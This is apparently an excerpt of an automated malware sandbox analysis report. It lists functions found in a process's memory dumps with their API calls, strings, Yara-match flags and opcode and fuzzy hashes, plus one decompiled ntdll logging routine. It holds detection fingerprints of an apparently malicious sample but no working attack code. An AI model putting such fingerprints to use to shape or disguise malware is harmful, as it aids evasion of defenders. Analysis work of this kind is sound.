                                                                        • Opcode Fuzzy Hash: df1e5ef97ba7081523fe544956595929f15e2b99295eb616ffe64419f7346978
                                                                        • Instruction Fuzzy Hash: 5D90027231115402F110615985047060009D7D1255F61C455A4855558D86D5D8A27162
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04B19710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 22a53c363e5231a99c9c78e0b3898e9f1f5fd1311e6b14fafa68e393b4bd1beb
                                                                        • Instruction ID: 80baaeaa99c1d2437712e688d7ae8d2292936a81a81422b22fdae3dc1b152361
                                                                        • Opcode Fuzzy Hash: 22a53c363e5231a99c9c78e0b3898e9f1f5fd1311e6b14fafa68e393b4bd1beb
                                                                        • Instruction Fuzzy Hash: 6690027220101402F100659955086460009D7E0355F61D055A9055555EC6A5D8A27171
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00856EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 00856F88
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: net.dll$wininet.dll
                                                                        • API String ID: 3472027048-1269752229
                                                                        • Opcode ID: b649c834af01e19f9cd4aa8c30ec0edb65ebb6f79c19b3e01f47bda10ac4ac9d
                                                                        • Instruction ID: 854c2b4b5e0652de7ecc7df607b198853a59511046cf8ec8fcbd4bddd69605de
                                                                        • Opcode Fuzzy Hash: b649c834af01e19f9cd4aa8c30ec0edb65ebb6f79c19b3e01f47bda10ac4ac9d
                                                                        • Instruction Fuzzy Hash: F231A4B1601704ABC725DF68D8A1FA7B7F8FB48700F40841DFA5A9B241E770B959CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00856EDA, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000007D0), ref: 00856F88
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID: net.dll$wininet.dll
                                                                        • API String ID: 3472027048-1269752229
                                                                        • Opcode ID: c3821af68578b203928b91420a14420ada686c1257095225d471614c0e396596
                                                                        • Instruction ID: e08ea0c99b35bec4d8e7f5f5ad0e5d56c042a74d2a31a9b317eaf31270851edb
                                                                        • Opcode Fuzzy Hash: c3821af68578b203928b91420a14420ada686c1257095225d471614c0e396596
                                                                        • Instruction Fuzzy Hash: 8221B4B1A01704ABC714DF58D8A1F6BB7B4FB48704F40805DFA599B241E770A959CBE1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 008584D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00843B93), ref: 008584FD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: .z`
                                                                        • API String ID: 3298025750-1441809116
                                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                        • Instruction ID: 818988d22c745ec44f819dfca0dea2778192157d95bdf2f0507b72982704c1ea
                                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                        • Instruction Fuzzy Hash: 01E04FB1200204ABD714DF59CC45EA777ACEF88750F014555FD0857241CA30F914CAF0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00847260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 008472BA
                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 008472DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 67bad0e5d4a92adc6d33317a1789ea242d46e63bd7c884a2fd5f29a5abb33580
                                                                        • Instruction ID: 79c7129493bfddcdac580217861894c8419476b814b92aaf6bc9d6c7fed484fd
                                                                        • Opcode Fuzzy Hash: 67bad0e5d4a92adc6d33317a1789ea242d46e63bd7c884a2fd5f29a5abb33580
                                                                        • Instruction Fuzzy Hash: E8018F31A8022C76EB21A6989C43FFE776CEB40B51F550119FF04FA1C1E6D46A0A86F6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00847233, Relevance: 3.1, APIs: 2, Instructions: 52threadwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 008472BA
                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 008472DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 4803768af5a2d78e7dee54ffd316d8aa6a690ae8c324d4a1856824b45acc6fc7
                                                                        • Instruction ID: 908dc23ca4c40292517ea8d3619f1c64c04cf4d622a547390d7468a478ef22bc
                                                                        • Opcode Fuzzy Hash: 4803768af5a2d78e7dee54ffd316d8aa6a690ae8c324d4a1856824b45acc6fc7
                                                                        • Instruction Fuzzy Hash: 6501F972A4152877D630A9686C43FF97358FB40B12F59016AFE09DB2C1E7D55D0982E2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 008472E3, Relevance: 3.0, APIs: 2, Instructions: 48threadwindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 008472BA
                                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 008472DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: f06db347e367a4195a42f2bab52b6a357fdc414564519bb39e123ec84f3c708c
                                                                        • Instruction ID: b17c7188e0dd3a223a25585d613e396809ae91b9a915253e02c2a04959c0033b
                                                                        • Opcode Fuzzy Hash: f06db347e367a4195a42f2bab52b6a357fdc414564519bb39e123ec84f3c708c
                                                                        • Instruction Fuzzy Hash: CCF02831A4063C76EB2166949C42FBE7718FB40B51F154259FE04FA1C1E6D4690547E2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 008585D5, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0084CFA2,0084CFA2,?,00000000,?,?), ref: 00858660
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: d1566dc820442031c0b7b29f7879b9afeab30f159bfb8ef825fe3bdd84356171
                                                                        • Instruction ID: 29d6fdccf3e2b10c9bd72880d181907faaaf4e0a88d6d7610e67970ca78f943f
                                                                        • Opcode Fuzzy Hash: d1566dc820442031c0b7b29f7879b9afeab30f159bfb8ef825fe3bdd84356171
                                                                        • Instruction Fuzzy Hash: 7F017CB5200208AFDB14EF58DC81DEB77A9EF88344F118519FD4897342CA31E815CBB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0085853D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00858594
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: e2b3ce8800108a557a64704621d94b2eba52eca109b1d711f787a32a78d7f933
                                                                        • Instruction ID: adf0bb7fb4c56ae351d82d2ccf191638075014ef66f5780d5c7fc8e3bf0cc25e
                                                                        • Opcode Fuzzy Hash: e2b3ce8800108a557a64704621d94b2eba52eca109b1d711f787a32a78d7f933
                                                                        • Instruction Fuzzy Hash: 38019DB2210108AFCB58CF99DC81EEB77A9AF8C354F158259FA0DE7251C630E851CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00858540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00858594
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateInternalProcess
                                                                        • String ID:
                                                                        • API String ID: 2186235152-0
                                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                        • Instruction ID: d3af858a44dea3fd7f239673061d5b29f945fbfe0f36b9b703668ab8674bbe02
                                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                        • Instruction Fuzzy Hash: 3B01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241CA30E851CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00857003, Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0084CCD0,?,?), ref: 0085704C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: 568c07f242c592475103e3f16555b1998be1e8b1b8eb94f8e9976592c86cfd01
                                                                        • Instruction ID: 3ae30373d82d6a11db751e76d769a671f29836f72d048b244f2f8bf4b044b41b
                                                                        • Opcode Fuzzy Hash: 568c07f242c592475103e3f16555b1998be1e8b1b8eb94f8e9976592c86cfd01
                                                                        • Instruction Fuzzy Hash: 10F0E5363917803AE731226C8C03FA77B89DB92B65F580259FA4AEF2C2D591F8074295
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00857010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0084CCD0,?,?), ref: 0085704C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateThread
                                                                        • String ID:
                                                                        • API String ID: 2422867632-0
                                                                        • Opcode ID: 89b5fcddf5cf94ebe47764815518dfbcb350786f50de0af2faf284d80b108530
                                                                        • Instruction ID: b2834652ce3aeb53a2058b00796fec0c1827a14249fb9b8d0ef2372b1a9f5b23
                                                                        • Opcode Fuzzy Hash: 89b5fcddf5cf94ebe47764815518dfbcb350786f50de0af2faf284d80b108530
                                                                        • Instruction Fuzzy Hash: F2E06D333907043AE630659DAC03FA7B39CDB81B62F540026FA0DEB2C1D595F80642A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00858621, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0084CFA2,0084CFA2,?,00000000,?,?), ref: 00858660
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: c4c12349f7843d4c95c896aebf4e8b7ec874d9d38be058e0a016e30f42c9c57d
                                                                        • Instruction ID: 72807fcf96565a136822ed37849ff63f4cf6d52fa49229e5fdb3cb0e27c11e67
                                                                        • Opcode Fuzzy Hash: c4c12349f7843d4c95c896aebf4e8b7ec874d9d38be058e0a016e30f42c9c57d
                                                                        • Instruction Fuzzy Hash: 4AF01C75200104ABCB20DF59CCC5EDB77AAEF88350F108655F90997246CA35A8068BE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00858490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00853516,?,00853C8F,00853C8F,?,00853516,?,?,?,?,?,00000000,00000000,?), ref: 008584BD
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction ID: 656494a5013bb87528da2a76b102ace08d92c742f240cfc07fe1bedc9a4c0cb2
                                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                        • Instruction Fuzzy Hash: ABE01AB1200204ABD714DF59CC41EA777ACEF88650F114559FE085B241C930F9148AB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00858630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0084CFA2,0084CFA2,?,00000000,?,?), ref: 00858660
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction ID: 4a34d6b5ba3d0751ad111b47a7f379e5262d0cb7500f09bbef94e2acf9ccfe16
                                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                        • Instruction Fuzzy Hash: 8BE01AB1200208ABDB10DF49CC85EE737ADEF88650F018555FE0867241C930E8148BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0084D410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,00847C63,?), ref: 0084D43B
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                        • Instruction ID: 11b779664c05767e435adec0e9dc7f4d00f0a015d29a0ed7f5d0bd524ef0a86e
                                                                        • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                        • Instruction Fuzzy Hash: 34D0A7727503083BEA10FBA89C03F2633CCAB54B40F494064F949D73C3D960F5004565
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04B1967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: eac1cd6351ffc4c15705860254355e417f9a758741d9708b81fc1159c58705d4
                                                                        • Instruction ID: c72c7c27cbc493ed042482d026a34c1b5fc2d71d38dbe60f0e912bc84018f3cf
                                                                        • Opcode Fuzzy Hash: eac1cd6351ffc4c15705860254355e417f9a758741d9708b81fc1159c58705d4
                                                                        • Instruction Fuzzy Hash: F9B09BB29015D5C5F711D76047087177904F7D0755F76C095D2060641A4778D091F5B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 04B6FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E04B6FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04B1CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04B65720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04B65720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                        0x04b6fdda
                                                                        0x04b6fde2
                                                                        0x04b6fde5
                                                                        0x04b6fdec
                                                                        0x04b6fdfa
                                                                        0x04b6fdff
                                                                        0x04b6fe0a
                                                                        0x04b6fe0f
                                                                        0x04b6fe17
                                                                        0x04b6fe1e
                                                                        0x04b6fe19
                                                                        0x04b6fe19
                                                                        0x04b6fe19
                                                                        0x04b6fe20
                                                                        0x04b6fe21
                                                                        0x04b6fe22
                                                                        0x04b6fe25
                                                                        0x04b6fe40

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B6FDFA
                                                                        Strings
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04B6FE01
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04B6FE2B
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: 60b7d91a8dbe621a53358d60e93ca879052cadad83e790958e9d7112d3fd7cb6
                                                                        • Instruction ID: f98db2bd5f91ef9ff165a131662fb179b28ce51ff62022aa9d8311cfaf44e4ca
                                                                        • Opcode Fuzzy Hash: 60b7d91a8dbe621a53358d60e93ca879052cadad83e790958e9d7112d3fd7cb6
                                                                        • Instruction Fuzzy Hash: FAF0C232640601BBE6201A45EC02F33BF6AEB44730F140294F628565E1EA62B83096A4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%